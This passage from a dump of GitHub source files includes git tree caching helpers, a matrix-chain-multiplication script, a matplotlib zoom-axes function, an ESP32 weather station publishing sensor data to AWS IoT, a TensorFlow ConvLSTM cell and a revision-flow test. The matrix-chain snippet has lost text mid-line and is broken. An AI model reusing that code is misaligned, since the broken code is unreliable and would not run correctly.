implicitly\n # delete 'a', but trying to delete 'a/b' will be a no-op and will not\n # delete 'a'.\n empty_tree = (await self.get_empty_tree())\n for name, sub_modifications in modifications_in_subtrees.items():\n subtree_base = None\n if name in entries and entries[name].type == TREE_TYPE:\n subtree_base = entries[name].hash\n new_subtree = await self.modify_tree(subtree_base,\n sub_modifications)\n if new_subtree != empty_tree:\n entries[name] = TreeEntry(TREE_MODE, TREE_TYPE, new_subtree)\n # Delete an empty tree if it was actually a tree to begin with.\n elif name in entries and entries[name].type == TREE_TYPE:\n del entries[name]\n\n # Return the resulting tree, or None if empty.\n if entries:\n session = self.no_index_git_session()\n tree = await session.make_tree_from_entries(entries)\n return tree\n else:\n return empty_tree\n\n\n@contextlib.contextmanager\ndef delete_if_error(path):\n '''If any exception is raised inside the context, delete the file at the\n given path, and allow the exception to continue.'''\n try:\n yield\n except Exception:\n if os.path.exists(path):\n os.remove(path)\n raise\n\n\ndef _format_file_lines(files):\n '''Given a list of filenames that we're about to print, limit it to a\n reasonable number of lines.'''\n LINES_TO_SHOW = 10\n if len(files) <= LINES_TO_SHOW:\n lines = '\\n'.join(files)\n else:\n lines = ('\\n'.join(files[:LINES_TO_SHOW - 1]) + '\\n...{} total'.format(\n len(files)))\n return lines\n\n\nclass GitError(Exception):\n def __init__(self, command, errorcode, stdout, stderr):\n self.command = \" \".join(command)\n self.errorcode = errorcode\n self.stdout = stdout\n self.stderr = stderr\n message = textwrap.dedent('''\\\n git command \"{}\" returned error code {}.\n stdout: {}\n stderr: {}''').format(command, errorcode, stdout, stderr)\n Exception.__init__(self, message)\n\n\nclass ModifyTreeError(PrintableError):\n pass\n\n\nclass DirtyWorkingCopyError(PrintableError):\n pass\n\n\nclass MergeConflictError(PrintableError):\n pass\n\n\nTreeEntry = collections.namedtuple('TreeEntry', ['mode', 'type', 'hash'])\n\nBLOB_TYPE = 'blob'\nTREE_TYPE = 'tree'\n\nNONEXECUTABLE_FILE_MODE = '100644'\nEXECUTABLE_FILE_MODE = '100755'\nTREE_MODE = '040000'\n\n# All possible ways to capitalize \".peru\", to exclude from 
imported trees.\nDOTPERU_CAPITALIZATIONS = [\n '.peru',\n '.Peru',\n '.pEru',\n '.peRu',\n '.perU',\n '.PEru',\n '.PeRu',\n '.PerU',\n '.pERu',\n '.pErU',\n '.peRU',\n '.PERu',\n '.PErU',\n '.PeRU',\n '.pERU',\n '.PERU',\n]\n\n\ndef dotperu_exclude_case_insensitive_git_globs():\n \"\"\"These use the glob syntax accepted by `git ls-files` (NOT our own\n glob.py). Note that ** must match at least one path component, so we have\n to use separate globs for matches at the root and matches below.\"\"\"\n globs = []\n for capitalization in DOTPERU_CAPITALIZATIONS:\n globs.append(capitalization + '/**')\n globs.append('**/' + capitalization + '/**')\n return globs\n","repo_name":"buildinspace/peru","sub_path":"peru/cache.py","file_name":"cache.py","file_ext":"py","file_size_in_byte":26022,"program_lang":"python","lang":"en","doc_type":"code","stars":1088,"dataset":"github-code","pt":"35"} +{"seq_id":"34235353732","text":"import sys\ndef brackets(arr,k_table,main):\n if len(arr)>2:\n bracket=arr.index(\"A\"+str(k_table[main.index(arr[0])][main.index(arr[len(arr)-1])]))\n new=[arr[:bracket+1],arr[bracket+1:]] \n if new!=arr and new[1]!=arr and new[0]!=arr:\n if(len(new[0])>1):\n new[0]=brackets(new[0],k_table,main)\n if len(new[1])>1: \n new[1]=brackets(new[1],k_table,main)\n \n return new\n else:\n return arr\n\ndef mcm(arr):\n matrix=[[0 for j in range(len(arr)-1)] for i in range(len(arr)-1)]\n k_table=[[0 for j in range(len(arr)-1)] for i in range(len(arr)-1)]\n arr.append(arr.pop(0))\n for v in range(1,len(arr)):\n i,j=0,v\n while i2:\n bracket=arr.index(\"A\"+str(k_table[main.index(arr[0])+1][main.index(arr[len(arr)-1])+1]))\n new=[arr[:bracket+1],arr[bracket+1:]] \n if new!=arr and new[1]!=arr and new[0]!=arr:\n if(len(new[0])>1):\n new[0]=brackets(new[0],k_table,main)\n if len(new[1])>1: \n new[1]=brackets(new[1],k_table,main)\n \n return new\n else:\n return arr\ndef mcm(p):\n matrix={k+1:{l+1:0 for l in range(0,len(p)-1)} for k in range(len(p)-1)}\n r={k+1:{l+1:0 for l in range(0,len(p)-1)} for k in range(len(p)-1)}\n\n for i in range(1,len(p)):\n x,y=1,i+1\n while x w/h=1.57 | h/w=0.64\n lbwh = (0.02,0.05,0.96,0.9) => \n\t\tlrbt = (0.02,0.9,0.05,0.95)\n\t'''\n\timport numpy as np\n\timport matplotlib.pyplot as plt\n\tfrom jizhipy.Plot import Color, Axes\n\tif (facecolor1 is None) : facecolor1 = 'none'\n\tif (facecolor2 is None) : facecolor2 = 'none'\n\tif (edgecolor1 is None) : edgecolor1 = 'none'\n\tif (edgecolor2 is None) : edgecolor2 = 'none'\n\t#----------------------------------------\n\tdef box2lrbt( box ) : return (box['left'], box['right'], box['bottom'], box['top'])\n\tdef lrbt2box( lrbt ) : return {'left':lrbt[0], 'right':lrbt[1], 'bottom':lrbt[2], 'top':lrbt[3]}\n\t#----------------------------------------\n\tdef LBWH( lrbt ) : # conver lrbt to lbwh and xy\n\t\tl, r, b, t = lrbt\n\t\tw, h = r-l, t-b\n\t#\tpars = FigureFrame()\n\t\tpars = {'left':0, 'right':1, 'bottom':0, 'top':1}\n\t\tw0 = pars['right'] - pars['left']\n\t\th0 = pars['top'] - pars['bottom']\n\t\tl, w = pars['left']+l*w0, w*w0\n\t\tb, h = pars['bottom']+b*h0, h*h0\n\t\tlbwh = [l, b, w, h]\n\t\tr, t = l+w, b+h\n\t\txy = np.array([(r,t), (l,t), (l,b), (r,b)])\n\t\treturn lbwh, xy\n\t#----------------------------------------\n\tlrbt1, lrbt2 = None, None\n\tif (box1 is not None) : lrbt1 = box2lrbt(box1)\n\tif (box2 is not None) : lrbt2 = box2lrbt(box2)\n\t#----------------------------------------\n\tif (link1 is None) : # NOT link\n\t\tec0, fc0 = Color.Edgecolor(edgecolor1), Color.Facecolor(facecolor1)\n\t\taxlist, 
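# --- Editor's note (hedged): DOTPERU_CAPITALIZATIONS above enumerates all
# 2**4 = 16 case mixes of 'peru'. Purely as a cross-check (ordering aside),
# itertools.product generates the same set:
from itertools import product

def dotperu_variants():
    return {'.' + ''.join(chars) for chars in product(*zip('peru', 'PERU'))}

assert len(dotperu_variants()) == 16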
ax1, ax2, lbwh1, lbwh2 = [], None, None, None, None\n\t\tif (lrbt1 is not None) : \n\t\t\tColor.Edgecolor(edgecolor1)\n\t\t\tColor.Facecolor(facecolor1)\n\t\t\tlbwh1 = LBWH( lrbt1)[0]\n\t\t\tax1 = plt.axes(lbwh1)\n\t\t\taxlist.append(ax1)\n\t\t\tif (labeloff1) : \n\t\t\t\tAxes.Label('both', left=False, right=False, top=False, bottom=False)\n\t\t\t\tAxes.Tick('both', 'both', left=False, right=False, top=False, bottom=False)\n\t\t\tif (frameoff1) : Axes.Frameoff(ax1)\n\t\t#----------------------------------------\n\t\tif (lrbt2 is not None) : \n\t\t\tColor.Edgecolor(edgecolor2)\n\t\t\tColor.Facecolor(facecolor2)\n\t\t\tlbwh2 = LBWH(lrbt2)[0]\n\t\t\tax2 = plt.axes(lbwh2)\n\t\t\taxlist.append(ax2)\n\t\t\tif (labeloff2) : \n\t\t\t\tAxes.Label('both', left=False, right=False, top=False, bottom=False)\n\t\t\t\tAxes.Tick('both', 'both', left=False, right=False, top=False, bottom=False)\n\t\t\tif (frameoff2) : Axes.Frameoff(ax2)\n\t\t#----------------------------------------\n\t\tColor.Edgecolor(ec0), Color.Facecolor(fc0)\n\t\tif (lrbt1 is not None and lrbt2 is None) : \n\t\t\taxlist = [ax1, lrbt2box(lrbt1)]\n\t\telif (lrbt1 is not None and lrbt2 is not None) : \n\t\t\taxlist = [ax1, ax2, lrbt2box(lrbt1), lrbt2box(lrbt2)]\n\t\treturn axlist\n\t#----------------------------------------\n\t#----------------------------------------\n\telse : # link\n\t\tfrom jizhipy.Basic import IsType\n\t\tfrom jizhipy.Array import Asarray\n\t\tfrom mpl_toolkits.axes_grid1.inset_locator import mark_inset\n\t\tif (link2 is None) : link2 = link1\n\t\tlink1, link2 = Asarray(link1), Asarray(link2) \n\t\tn = min(len(link1), len(link2))\n\t\tlink1, link2 = link1[:n], link2[:n]\n\t\t#----------------------------------------\n\t\tec0, fc0 = Color.Edgecolor('none'), Color.Facecolor('none')\n\t\tlbwh1 = LBWH(lrbt1)[0]\n\t\tax1 = plt.axes(lbwh1)\n\t\tAxes.Frameoff(ax1)\n\t\t#----------------------------------------\n\t\tlbwh2, xy2 = LBWH(lrbt2)\n\t\tw0, h0 = 0.0001, 0.0001\n\t\tfor i in range(n) : \n\t\t\tl1, l2 = link1[i], link2[i]\n\t\t\tx, y = xy2[l2-1]\n\t\t\tif (l1 == 1) : lbwh = [x-w0, y-h0, w0, h0]\n\t\t\telif (l1 == 2) : lbwh = [x, y-h0, w0, h0]\n\t\t\telif (l1 == 3) : lbwh = [x, y, w0, h0]\n\t\t\telif (l1 == 4) : lbwh = [x-w0, y, w0, h0]\n\t\t\tax2 = plt.axes(lbwh)\n\t\t\tAxes.Frameoff(ax2)\n\t\t\tmark_inset(ax1, ax2, l1, l1, fc='none', ec=edgecolor2) # when use mark_inset() to link, frame of ax1 can NOT be remove while ax2 can. 
Therefore, use axlist[0] to be original image, axlist[1] to be the zoom region.\n\t\t#----------------------------------------\n\t\t# Re-plot ax1, ax2\n\t\tColor.Edgecolor(edgecolor1)\n\t\tColor.Facecolor(facecolor1)\n\t\th1, h2 = lbwh1[-1]*0.9999, lbwh2[-1]*0.9999\n\t\td1, d2 = lbwh1[-1]*0.0001, lbwh2[-1]*0.0001\n\t\tlbwh1[-1] = h1\n\t\tlbwh2[-1] = h2\n\t\tax1 = plt.axes(lbwh1) #@#@\n\t\tif (labeloff1) : \n\t\t\tAxes.Label('both', left=False, right=False, top=False, bottom=False, ax=ax1)\n\t\t\tAxes.Tick('both', 'both', left=False, right=False, top=False, bottom=False)\n\t\tif (frameoff1) : Axes.Frameoff(ax1)\n\t\tColor.Edgecolor(edgecolor2)\n\t\tColor.Facecolor(facecolor2)\n\t\tax2 = plt.axes(lbwh2) #@#@\n\t\tif (labeloff2) : \n\t\t\tAxes.Label('both', left=False, right=False, top=False, bottom=False, ax=ax2)\n\t\t\tAxes.Tick('both', 'both', left=False, right=False, top=False, bottom=False)\n\t\tif (frameoff2) : Axes.Frameoff(ax2)\n\t\tColor.Edgecolor(ec0), Color.Facecolor(fc0)\n\t\tlrbt1, lrbt2 = list(lrbt1), list(lrbt2)\n\t\tlrbt1[-1] -= d1\n\t\tlrbt2[-1] -= d2\n\t\taxlist =[ax1,ax2,lrbt2box(lrbt1),lrbt2box(lrbt2)]\n\t\treturn axlist\n\n","repo_name":"jizhi/jizhipy","sub_path":"Plot/Zoom.py","file_name":"Zoom.py","file_ext":"py","file_size_in_byte":7652,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"15913497388","text":"# Imports\r\nfrom umqtt.robust import MQTTClient\r\nimport time\r\nimport ujson\r\nfrom time import sleep\r\nimport dht\r\nimport sds011\r\nfrom machine import Pin, UART\r\n\r\n# AWS settings\r\nHOST = \"weather_station(can be whatever name you want)\"\r\nREGION = \"AWS REGION\"\r\nMQTT_HOST = \"YOUR_AWS_IOT_ENDPOINT\" #Your AWS IoT endpoint\r\n\r\nCERT_FILE = \"/device_certificate.pem.crt\" #the \".crt\" may be hidden that’s ok\r\nKEY_FILE = \"/private_key.key\"\r\n\r\nMQTT_CLIENT_ID = \"weather_station\"\r\nMQTT_PORT = 8883 #MQTT secured\r\n\r\nPUB_TOPIC = \"iot/outTopic\" #coming out of device\r\nSUB_TOPIC = \"iot/inTopic\" #coming into device\r\n\r\n# SDS011 worrks with uart. 
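# --- Editor's check (hedged): the Zoom.py docstring above pairs
# lbwh = (0.02, 0.05, 0.96, 0.9) with lrbt = (0.02, 0.9, 0.05, 0.95); since
# r = l + w = 0.98, the 0.9 there looks like a typo for 0.98. The
# conversion itself, spelled out:
def lrbt_to_lbwh(lrbt):
    l, r, b, t = lrbt
    return [l, b, r - l, t - b]

assert [round(v, 2) for v in lrbt_to_lbwh((0.02, 0.98, 0.05, 0.95))] == [0.02, 0.05, 0.96, 0.9]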
Set pins used for uart on ESP32\r\nuart = UART(1, baudrate = 9600, rx = 5, tx = 4)\r\ndust_sensor = sds011.SDS011(uart)\r\ndust_sensor.sleep()\r\n\r\n# Create a DHT sensor object and call methods to get values\r\nsensor = dht.DHT22(Pin(2))\r\nsensor.measure()\r\ntemp = sensor.temperature() * 9/5 + 32\r\nhumidity = sensor.humidity()\r\n\r\n\r\nWIFI_SSID = \"Name Of WIFI Here\"\r\nWIFI_PW = \"Password to wifi here\"\r\n\r\nMQTT_CLIENT = None\r\n\r\nprint(\"starting program\")\r\n\r\n# Function to connect to local wi-fi\r\ndef network_connect():\r\n    print(\"starting connection method\")\r\n    import network\r\n    sta_if = network.WLAN(network.STA_IF)\r\n    if not sta_if.isconnected():\r\n        print('connecting to network...')\r\n        sta_if.active(True)\r\n        sta_if.connect(WIFI_SSID , WIFI_PW)\r\n        while not sta_if.isconnected():\r\n            pass\r\n    print('network config:', sta_if.ifconfig())\r\n\r\n\r\n    \r\ndef pub_msg(msg): #publish is synchronous so we poll and publish\r\n    global MQTT_CLIENT\r\n    try: \r\n        MQTT_CLIENT.publish(PUB_TOPIC, msg)\r\n        print(\"Sent: \" + msg)\r\n    except Exception as e:\r\n        print(\"Exception publish: \" + str(e))\r\n        raise\r\n\r\ndef sub_cb(topic, msg):\r\n    print('Device received a Message: ')\r\n    print((topic, msg)) #print incoming message, waits for loop below\r\n    pin.value(0) #blink if incoming message by toggle off (note: 'pin' is never defined in this file; an output Pin would be needed)\r\n\r\ndef device_connect(): \r\n    global MQTT_CLIENT\r\n\r\n    try: #all this below runs once, equivalent to Arduino's \"setup\" function\r\n        with open(KEY_FILE, \"r\") as f: \r\n            key = f.read()\r\n            print(\"Got Key\")\r\n            \r\n        with open(CERT_FILE, \"r\") as f: \r\n            cert = f.read()\r\n            print(\"Got Cert\")\r\n\r\n        MQTT_CLIENT = MQTTClient(client_id=MQTT_CLIENT_ID, server=MQTT_HOST, port=MQTT_PORT, keepalive=5000, ssl=True, ssl_params={\"cert\":cert, \"key\":key, \"server_side\":False})\r\n        MQTT_CLIENT.connect()\r\n        print('MQTT Connected')\r\n        MQTT_CLIENT.set_callback(sub_cb)\r\n        MQTT_CLIENT.subscribe(SUB_TOPIC)\r\n        print('Subscribed to %s as the incoming topic' % (SUB_TOPIC))\r\n        return MQTT_CLIENT\r\n    except Exception as e:\r\n        print('Cannot connect MQTT: ' + str(e))\r\n        raise\r\n\r\n\r\n#start execution\r\ntry:\r\n    print(\"Connecting WIFI\")\r\n    network_connect()\r\n    print(\"Connecting MQTT\")\r\n    device_connect()\r\n    while True: #loop forever\r\n        pending_message = MQTT_CLIENT.check_msg() # check for new subscription payload incoming\r\n        if pending_message is not None: #check if we have a message (the old comparison to the string 'None' was always true)\r\n            dust_sensor.wake()\r\n            time.sleep(5)\r\n            # #Returns NOK if no measurement found in reasonable time\r\n            status = dust_sensor.read()\r\n            #Returns NOK if checksum failed\r\n            pkt_status = dust_sensor.packet_status\r\n            #Stop fan\r\n            dust_sensor.sleep()\r\n            sensor.measure()\r\n            temp = sensor.temperature() * 9/5 + 32\r\n            humidity = sensor.humidity()\r\n            deviceTime = time.time()\r\n            values = {\"temperature\": temp,\r\n                      \"humidity\": humidity,\r\n                      \"pm2.5\": dust_sensor.pm25,\r\n                      \"pm10\": dust_sensor.pm10}\r\n            pm25 = dust_sensor.pm25\r\n            pm10 = dust_sensor.pm10\r\n            print(\"Publishing\")\r\n#            pub_msg(ujson.dumps(values))\r\n            pub_msg(\"{\\n  \\\"temperature\\\": %d,\\n  \\\"humidity\\\": %d,\\n  \\\"pm25\\\": %d,\\n \\\"pm10\\\": %d \\n}\"%(temp,humidity,pm25,pm10))\r\n            print(\"published payload\")\r\n            time.sleep(5) #A 5 second delay between publishing, adjust as you like\r\n        \r\nexcept Exception as e:\r\n    
print(str(e))","repo_name":"MilesofCode/IoTProjects","sub_path":"weather_station_main.py","file_name":"weather_station_main.py","file_ext":"py","file_size_in_byte":4413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"19304713054","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport collections\nimport math\n\nfrom tensorflow.contrib.compiler import jit\nfrom tensorflow.contrib.layers.python.layers import layers\nfrom tensorflow.contrib.rnn.python.ops import core_rnn_cell\nfrom tensorflow.python.framework import constant_op\nfrom tensorflow.python.framework import dtypes\nfrom tensorflow.python.framework import op_def_registry\nfrom tensorflow.python.framework import ops\nfrom tensorflow.python.framework import tensor_shape\nfrom tensorflow.python.layers import base as base_layer\nfrom tensorflow.python.ops import array_ops\nfrom tensorflow.python.ops import clip_ops\nfrom tensorflow.python.ops import gen_array_ops\nfrom tensorflow.python.ops import init_ops\nfrom tensorflow.python.ops import math_ops\nfrom tensorflow.python.ops import nn_impl # pylint: disable=unused-import\nfrom tensorflow.python.ops import nn_ops\nfrom tensorflow.python.ops import partitioned_variables # pylint: disable=unused-import\nfrom tensorflow.python.ops import random_ops\nfrom tensorflow.python.ops import rnn_cell_impl\nfrom tensorflow.python.ops import variable_scope as vs\nfrom tensorflow.python.platform import tf_logging as logging\nfrom tensorflow.python.util import nest\n\n\ndef _get_concat_variable(name, shape, dtype, num_shards):\n \"\"\"Get a sharded variable concatenated into one tensor.\"\"\"\n sharded_variable = _get_sharded_variable(name, shape, dtype, num_shards)\n if len(sharded_variable) == 1:\n return sharded_variable[0]\n\n concat_name = name + \"/concat\"\n concat_full_name = vs.get_variable_scope().name + \"/\" + concat_name + \":0\"\n for value in ops.get_collection(ops.GraphKeys.CONCATENATED_VARIABLES):\n if value.name == concat_full_name:\n return value\n\n concat_variable = array_ops.concat(sharded_variable, 0, name=concat_name)\n ops.add_to_collection(ops.GraphKeys.CONCATENATED_VARIABLES, concat_variable)\n return concat_variable\n\n\ndef _get_sharded_variable(name, shape, dtype, num_shards):\n \"\"\"Get a list of sharded variables with the given dtype.\"\"\"\n if num_shards > shape[0]:\n raise ValueError(\"Too many shards: shape=%s, num_shards=%d\" % (shape,num_shards))\n unit_shard_size = int(math.floor(shape[0] / num_shards))\n remaining_rows = shape[0] - unit_shard_size * num_shards\n\n shards = []\n for i in range(num_shards):\n current_size = unit_shard_size\n if i < remaining_rows:\n current_size += 1\n shards.append(\n vs.get_variable(\n name + \"_%d\" % i, [current_size] + shape[1:], dtype=dtype))\n return shards\n\n\ndef _norm(g, b, inp, scope):\n shape = inp.get_shape()[-1:]\n gamma_init = init_ops.constant_initializer(g)\n beta_init = init_ops.constant_initializer(b)\n with vs.variable_scope(scope):\n # Initialize beta and gamma for use by layer_norm.\n vs.get_variable(\"gamma\", shape=shape, initializer=gamma_init)\n vs.get_variable(\"beta\", shape=shape, initializer=beta_init)\n normalized = layers.layer_norm(inp, reuse=True, scope=scope)\n return normalized\n\n\n\nclass ConvLSTMCell(rnn_cell_impl.RNNCell):\n \"\"\"Convolutional LSTM recurrent network cell, we added \"reuse\" item.\n\n https://arxiv.org/pdf/1506.04214v1.pdf\n \"\"\"\n\n 
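# --- Editor's sketch (hedged): weather_station_main.py above repeats the
# Fahrenheit conversion C * 9/5 + 32 inline; a helper keeps the formula in
# one place. The asserts use the standard fixed points of the scale.
def c_to_f(celsius):
    return celsius * 9 / 5 + 32

assert c_to_f(0) == 32.0
assert c_to_f(100) == 212.0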
def __init__(self,\n conv_ndims,\n input_shape,\n output_channels,\n kernel_shape,\n use_bias=True,\n skip_connection=False,\n forget_bias=1.0,\n initializers=None,\n reuse=None):\n \"\"\"Construct ConvLSTMCell.\n\n Args:\n conv_ndims: Convolution dimensionality (1, 2 or 3).\n input_shape: Shape of the input as int tuple, excluding the batch size.\n output_channels: int, number of output channels of the conv LSTM.\n kernel_shape: Shape of kernel as in tuple (of size 1,2 or 3).\n use_bias: (bool) Use bias in convolutions.\n skip_connection: If set to `True`, concatenate the input to the\n output of the conv LSTM. Default: `False`.\n forget_bias: Forget bias.\n initializers: Unused.\n name: Name of the module.\n\n Raises:\n ValueError: If `skip_connection` is `True` and stride is different from 1\n or if `input_shape` is incompatible with `conv_ndims`.\n \"\"\"\n super(ConvLSTMCell, self).__init__(_reuse=reuse)\n\n if conv_ndims != len(input_shape) - 1:\n raise ValueError(\"Invalid input_shape {} for conv_ndims={}.\".format(\n input_shape, conv_ndims))\n\n self._conv_ndims = conv_ndims\n self._input_shape = input_shape\n self._output_channels = output_channels\n self._kernel_shape = kernel_shape\n self._use_bias = use_bias\n self._forget_bias = forget_bias\n self._skip_connection = skip_connection\n self._reuse = reuse\n\n self._total_output_channels = output_channels\n if self._skip_connection:\n self._total_output_channels += self._input_shape[-1]\n\n state_size = tensor_shape.TensorShape(\n self._input_shape[:-1] + [self._output_channels])\n self._state_size = rnn_cell_impl.LSTMStateTuple(state_size, state_size)\n self._output_size = tensor_shape.TensorShape(\n self._input_shape[:-1] + [self._total_output_channels])\n\n @property\n def output_size(self):\n return self._output_size\n\n @property\n def state_size(self):\n return self._state_size\n\n def call(self, inputs, state, scope=None):\n with vs.variable_scope(scope, reuse=self._reuse):\n cell, hidden = state\n new_hidden = _conv([inputs, hidden], self._kernel_shape,\n 4 * self._output_channels, self._use_bias)\n gates = array_ops.split(\n value=new_hidden, num_or_size_splits=4, axis=self._conv_ndims + 1)\n input_gate, new_input, forget_gate, output_gate = gates\n new_cell = math_ops.sigmoid(forget_gate + self._forget_bias) * cell\n new_cell += math_ops.sigmoid(input_gate) * math_ops.tanh(new_input)\n output = math_ops.tanh(new_cell) * math_ops.sigmoid(output_gate)\n\n if self._skip_connection:\n output = array_ops.concat([output, inputs], axis=-1)\n new_state = rnn_cell_impl.LSTMStateTuple(new_cell, output)\n return output, new_state\n\n\nclass Conv1DLSTMCell(ConvLSTMCell):\n \"\"\"1D Convolutional LSTM recurrent network cell.\n\n https://arxiv.org/pdf/1506.04214v1.pdf\n \"\"\"\n\n def __init__(self, name=\"conv_1d_lstm_cell\", **kwargs):\n \"\"\"Construct Conv1DLSTM. See `ConvLSTMCell` for more details.\"\"\"\n super(Conv1DLSTMCell, self).__init__(conv_ndims=1, name=name, **kwargs)\n\n\nclass Conv2DLSTMCell(ConvLSTMCell):\n \"\"\"2D Convolutional LSTM recurrent network cell.\n\n https://arxiv.org/pdf/1506.04214v1.pdf\n \"\"\"\n\n def __init__(self, name=\"conv_2d_lstm_cell\", **kwargs):\n \"\"\"Construct Conv2DLSTM. 
See `ConvLSTMCell` for more details.\"\"\"\n super(Conv2DLSTMCell, self).__init__(conv_ndims=2, name=name, **kwargs)\n\n\nclass Conv3DLSTMCell(ConvLSTMCell):\n \"\"\"3D Convolutional LSTM recurrent network cell.\n\n https://arxiv.org/pdf/1506.04214v1.pdf\n \"\"\"\n\n def __init__(self, name=\"conv_3d_lstm_cell\", **kwargs):\n \"\"\"Construct Conv3DLSTM. See `ConvLSTMCell` for more details.\"\"\"\n super(Conv3DLSTMCell, self).__init__(conv_ndims=3, name=name, **kwargs)\n\n\ndef _conv(args, filter_size, num_features, bias, bias_start=0.0):\n \"\"\"Convolution.\n\n Args:\n args: a Tensor or a list of Tensors of dimension 3D, 4D or 5D,\n batch x n, Tensors.\n filter_size: int tuple of filter height and width.\n num_features: int, number of features.\n bias: Whether to use biases in the convolution layer.\n bias_start: starting value to initialize the bias; 0 by default.\n\n Returns:\n A 3D, 4D, or 5D Tensor with shape [batch ... num_features]\n\n Raises:\n ValueError: if some of the arguments has unspecified or wrong shape.\n \"\"\"\n\n # Calculate the total size of arguments on dimension 1.\n total_arg_size_depth = 0\n shapes = [a.get_shape().as_list() for a in args]\n shape_length = len(shapes[0])\n for shape in shapes:\n if len(shape) not in [3, 4, 5]:\n raise ValueError(\"Conv Linear expects 3D, 4D \"\n \"or 5D arguments: %s\" % str(shapes))\n if len(shape) != len(shapes[0]):\n raise ValueError(\"Conv Linear expects all args \"\n \"to be of same Dimension: %s\" % str(shapes))\n else:\n total_arg_size_depth += shape[-1]\n dtype = [a.dtype for a in args][0]\n\n # determine correct conv operation\n if shape_length == 3:\n conv_op = nn_ops.conv1d\n strides = 1\n elif shape_length == 4:\n conv_op = nn_ops.conv2d\n strides = shape_length * [1]\n elif shape_length == 5:\n conv_op = nn_ops.conv3d\n strides = shape_length * [1]\n\n # Now the computation.\n kernel = vs.get_variable(\n \"kernel\", filter_size + [total_arg_size_depth, num_features], dtype=dtype)\n if len(args) == 1:\n res = conv_op(args[0], kernel, strides, padding=\"SAME\")\n else:\n res = conv_op(\n array_ops.concat(axis=shape_length - 1, values=args),\n kernel,\n strides,\n padding=\"SAME\")\n if not bias:\n return res\n bias_term = vs.get_variable(\n \"biases\", [num_features],\n dtype=dtype,\n initializer=init_ops.constant_initializer(bias_start, dtype=dtype))\n return res + bias_term\n","repo_name":"XuzheZ/DPLN-EMSeg","sub_path":"DPLN/cell/rnn_cell.py","file_name":"rnn_cell.py","file_ext":"py","file_size_in_byte":9218,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"17576764656","text":"# 학교에서 축구대회를 열기로 했다. 
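# --- Editor's check (hedged): _get_sharded_variable() in rnn_cell.py above
# gives each of the first (rows % num_shards) shards one extra row. The
# same arithmetic in pure Python, with a quick property check:
def shard_sizes(rows, num_shards):
    base, extra = divmod(rows, num_shards)
    return [base + 1 if i < extra else base for i in range(num_shards)]

assert shard_sizes(10, 3) == [4, 3, 3]
assert sum(shard_sizes(10, 4)) == 10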
본교 학생 수가 많아서 되도록 큰 운동장을 필요로 한다.\n# 학교 근처에 축구를 할 수 있는 운동장이 3개가 있는데 각 운동장의 가로와 세로의 길이를 홈페이지를 통해서 알 수 있었다.\n# 우리는 3개의 운동장 중 가장 큰 운동장을 빌리기로 했다.\n# 이 3개의 운동장 중 가장 넓은 운동장의 넓이를 구하는 프로그램을 작성하시오.\n\nlist1 = []\n\nfor i in range(3):\n    a , b = input().split()\n    a = int(a)\n    b = int(b)\n    c = a * b\n    list1.append(c)\n# print(list1)\n\n# max() also covers ties; the original chain of strict comparisons printed\n# nothing when two areas were equal\nprint(max(list1))\n\n\n\n\n","repo_name":"polkmn222/codeup-python","sub_path":"1289.py","file_name":"1289.py","file_ext":"py","file_size_in_byte":834,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"42680788958","text":"import json\nimport os\nimport unittest\nfrom urllib.parse import quote\n\nimport requests\nfrom tenacity import retry, stop_after_attempt, wait_fixed\n\nfrom tests.functional.backend.common import BaseFunctionalTestCase\n\n\nclass TestRevisions(BaseFunctionalTestCase):\n    @classmethod\n    def setUpClass(cls):\n        super().setUpClass()\n\n    def create_collection(self, headers):\n        data = {\n            \"contact_email\": \"lisbon@gmail.com\",\n            \"contact_name\": \"Madrid Sparkle\",\n            \"curator_name\": \"John Smith\",\n            \"description\": \"Well here are some words\",\n            \"links\": [{\"link_name\": \"a link to somewhere\", \"link_type\": \"PROTOCOL\", \"link_url\": \"http://protocol.com\"}],\n            \"name\": \"my2collection\",\n        }\n\n        res = self.session.post(f\"{self.api}/dp/v1/collections\", data=json.dumps(data), headers=headers)\n        res.raise_for_status()\n        data = json.loads(res.content)\n        collection_id = data[\"collection_id\"]\n\n        # Doesn't work since the collection is published. See issue #1375\n        # Should work now via cxg-admin role thru Curation API\n        curation_api_headers = {\"Authorization\": f\"Bearer {self.curation_api_access_token}\"}\n        self.addCleanup(\n            self.session.delete,\n            f\"{self.api}/curation/v1/collections/{collection_id}?delete_published=true\",\n            headers=curation_api_headers,\n        )\n        self.assertStatusCode(requests.codes.created, res)\n        self.assertIn(\"collection_id\", data)\n        return collection_id\n\n    def create_explorer_url(self, dataset_id):\n        return f\"https://cellxgene.{self.deployment_stage}.single-cell.czi.technology/e/{dataset_id}.cxg/\"\n\n    # TODO: Remove rdev from skip list. 
Rdev Explorer is required for this test to pass.\n @unittest.skipIf(os.environ[\"DEPLOYMENT_STAGE\"] in [\"prod\", \"rdev\"], \"Do not make test collections public in prod\")\n def test_revision_flow(self):\n\n headers = {\"Cookie\": f\"cxguser={self.curator_cookie}\", \"Content-Type\": \"application/json\"}\n\n collection_id = self.create_collection(headers)\n\n dataset_1_dropbox_url = self.test_dataset_uri\n dataset_2_dropbox_url = self.test_dataset_uri\n\n # Uploads a dataset\n self.upload_and_wait(collection_id, dataset_1_dropbox_url)\n\n # make collection public\n with self.subTest(\"Test make collection public\"):\n body = {\"data_submission_policy_version\": \"1.0\"}\n res = self.session.post(\n f\"{self.api}/dp/v1/collections/{collection_id}/publish\", headers=headers, data=json.dumps(body)\n )\n res.raise_for_status()\n self.assertStatusCode(requests.codes.accepted, res)\n\n # get canonical collection id, post-publish\n res = self.session.get(f\"{self.api}/dp/v1/collections/{collection_id}\", headers=headers)\n data = json.loads(res.content)\n canonical_collection_id = data[\"id\"]\n\n dataset_response = self.session.get(f\"{self.api}/dp/v1/collections/{canonical_collection_id}\").json()[\n \"datasets\"\n ][0]\n dataset_id = dataset_response[\"id\"]\n explorer_url = dataset_response[\"dataset_deployments\"][0][\"url\"]\n\n meta_payload_before_revision_res = self.session.get(f\"{self.api}/dp/v1/datasets/meta?url={explorer_url}\")\n meta_payload_before_revision_res.raise_for_status()\n meta_payload_before_revision = meta_payload_before_revision_res.json()\n\n # Endpoint is eventually consistent\n schema_before_revision = 